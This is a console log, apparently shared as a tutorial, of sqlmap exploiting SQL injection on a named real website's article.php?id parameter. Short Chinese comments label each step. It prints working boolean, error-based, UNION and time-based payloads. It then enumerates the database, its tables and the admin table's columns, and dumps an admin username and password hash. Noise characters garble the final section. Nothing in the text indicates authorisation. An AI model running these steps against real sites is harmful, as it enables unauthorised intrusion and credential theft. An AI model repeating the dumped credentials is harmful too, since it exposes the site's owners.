D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* 注解:获取当前用户名称
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /*当前数据库
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
- `6 C2 y3 x! f% n8 Qrecognized possible password hash values. do you want to use dictionary attack o
7 @ H, p/ d; nn retrieved table items? [Y/n/q] y
# o$ @4 L+ R0 M( \$ U ?& Kwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
; E I3 v2 u5 z5 G/ p: edo you want to use common password suffixes? (slow!) [y/N] y
8 w1 s- ]2 U; c, m1 |" T( vDatabase: wepost
; `: w# R$ d/ P. [8 bTable: admin% f$ ]2 S" r2 }+ X( h2 Z+ y
[1 entry]2 v ~$ U$ ?4 x- j9 m e) x! d- s
+----------------------------------+------------+6 B- Y$ Q8 b+ h" K4 R
| password | userid |8 T9 B9 \0 H* G* |7 v5 y& `
+----------------------------------+------------+
! h+ r: g1 ~8 ^| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
: ?% l* Y: P5 V8 t5 y1 n5 W( G' f; a, ]+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap> |